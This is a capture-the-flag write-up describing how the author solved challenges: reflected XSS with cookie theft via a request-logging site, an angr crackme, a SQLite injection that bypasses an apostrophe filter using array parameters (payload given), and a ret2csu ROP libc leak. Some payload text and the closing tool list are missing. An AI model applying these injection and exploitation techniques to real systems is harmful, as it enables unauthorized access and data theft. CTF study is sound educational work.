This competition was on 5 - 7 Feb 2021. We placed 157th / 1059.
HTML ended up being executed directly on a webpage through a get parameter (name), but script tags weren't. After I added the fixed CSP nonce to the script tag, I was able to achieve a reflected XSS. Webhook.site
is a site which allows the logging of the HTTP requests to itself, which I used to recover the secret cookie and ultimately the flag.
The complete payload was
I determined the state which lead to "Correct!" being outputted in a crackme which was ultimately the flag. Read more at https://docs.angr.io/core-concepts/pathgroups
After reading the source, this appears to be a sqlite injection with an apostrophe restriction. However, it seems impossible! You need double quotes to escape out of an apostrophe in sqlite, so user: \, pass: OR 1=1; --
doesn't work. Luckily, the backend javascript uses an includes function to filter apostrophes. Making password an array would bypass the apostrophe restriction.
user: admin
pass[]: ' OR 1=1;--
as get parameters will grant you the flag!
I disassembled the binary with objdump -d babyrop -M intel
. I noticed a large number of pops in __libc_csu_init
, which is indicative of an abundance of ROP gadgets. ROP gadgets enable one to control register (assembly variable) values without executing shellcode/writing stuff on the stack. Because of this observation, I suspected this binary to be vulnerable to ret2csu.
I followed https://pwning.tech/2020/04/13/ret2csu/ a lot.
The premise is that __libc_csu_init
allows one to control the three top argument registers, rdi, rsi, and rcx, from the x64 calling convention. Put another way, when calling a function in x64 assembly, the first argument needs to be in rdi, second in rsi, and third in rcx. This enables one to call write
, which has three arguments (man 2 write
), which will output the address of any function in GOT table. This is important because GOT tables enable in loading functions from libc (a global C library) at runtime, and these functions' address locations are randomized. By printing out a function in the GOT table, you can de-randomize the libc base, and therefore use one gadgets (automatic shell popping gadgets in libc versions).
The complete "tools" I used in no particular order were: